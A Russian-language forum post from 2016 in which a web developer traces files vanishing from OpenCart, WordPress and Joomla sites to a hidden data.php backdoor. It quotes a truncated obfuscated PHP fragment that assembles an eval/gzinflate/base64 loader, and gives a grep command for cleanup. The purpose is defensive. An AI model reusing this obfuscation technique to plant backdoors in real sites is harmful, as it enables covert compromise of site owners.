Докопался: удаление файлов mail.php и controller.php

[streetr]

Всем привет, последнее время часто заказывают исправление проблемы с удалением файла mail.php и иногда controller.php, Чаще всего обращаются по сайтам на opencart (может потому что основная специальность у меня по нему) но и wordpress, joomla так же страдают такой траблой. Естественно вирус, естественно чистим, но все равно файлы пропадают через некоторое время. Ну начал я наблюдать активно за одним из таких сайтов, и нашел все таки в логах обращение с POST запросом к файлу data.php (почему то не один из антивиров типа айболита не подозревал этот код) (полный путь писать смысла нету, у всех лежит в разных папках) и картинка с именем data.jpg (не у всех клиентов был такой, а у некоторых имя другое, ищем в содержании файла по слову описанному ниже)

содержание файла примерно такое 

 

<?php $YLbgPfj524 = "vh46afl7tm2ik*n3pws.bu;0j)(qo_erzxy51dg9c8/";$oDJXw7301 = $YLbgPfj524[16].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[38].$YLbgPfj524[29].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[16].$YLbgPfj524[6].$YLbgPfj524[4].$YLbgPfj524[40].$YLbgPfj524[30];$Gcwa9593 = "".chr(101)."\x76".chr(97)."".chr(108)."".chr(40)."g\x7Ai\x6E".chr(102)."".chr(108)."a".chr(116)."".chr(101)."".chr(40)."ba".chr(115)."e".chr(54).

После поиска по всем файлам на сайте по слову YLbgPfj524  ( grep -rl 'YLbgPfj524' /PATH_TO_SITE/ ) вычистил весь подобный хлам, и УРА все тихо. Вирус однотипный, так как содержание файла data.php у всех одинаковое, клиенты часть новые, от меня заражения быть у них не могло, проблемы, код вируса и имена файлов у всех одинаковы.

P>S написать решил имеено сюда,  как так когда искал инфу по проблеме, находил топики

http://searchengines.guru/showthread.php?t=914314

И такой каталог был на сервере, только в корне

https://opencartforum.com/topic/52058-наверное-взломали/

Змінено 21 січня 2016 користувачем streetr